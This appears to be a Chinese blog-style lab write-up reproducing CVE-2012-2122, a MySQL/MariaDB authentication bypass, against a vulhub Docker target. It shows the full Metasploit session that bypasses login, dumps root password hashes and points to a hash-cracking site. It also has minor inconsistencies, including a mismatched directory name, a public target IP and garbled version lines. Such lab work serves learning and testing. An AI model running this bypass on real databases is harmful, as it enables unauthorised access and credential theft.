漏洞介绍

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。按照公告说法大约256次就能够蒙对一次

受影响版本:

  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not

靶场

进入/vulhub/phpmyadmin/CVE-2018-12613

1
docker-compose up -d
1
2
3
zss@zss > ~/漏洞复现/vulhub/mysql/CVE-2012-2122>>> sudo docker-compose up -d           
[sudo] zss 的密码:        
Starting cve-2012-2122_mysql_1 ... done

漏洞验证

启动msfconsole

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
msf6 > use  auxiliary/scanner/mysql/mysql_authbypass_hashdump 
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set RHOSTS 60.2.185.218
RHOSTS => 60.2.185.218
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set THREADS 10  # 设置线程
THREADS => 10  
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run 
[+] 192.168.0.106:3306    - 192.168.0.106:3306 The server allows logins, proceeding with bypass test
[*] 192.168.0.106:3306    - 192.168.0.106:3306 Authentication bypass is 10% complete
[*] 192.168.0.106:3306    - 192.168.0.106:3306 Authentication bypass is 20% complete
[*] 192.168.0.106:3306    - 192.168.0.106:3306 Authentication bypass is 30% complete
[*] 192.168.0.106:3306    - 192.168.0.106:3306 Authentication bypass is 40% complete
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Successfully bypassed authentication after 411 attempts. URI: mysql://root:Egvoq@192.168.0.106:3306
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306    - 192.168.0.106:3306 Hash Table has been saved: /home/zss/.msf4/loot/20211230110548_default_192.168.0.106_mysql.hashes_615289.txt
[*] 192.168.0.106:3306    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

https://www.cmd5.com/

image-20211230110730285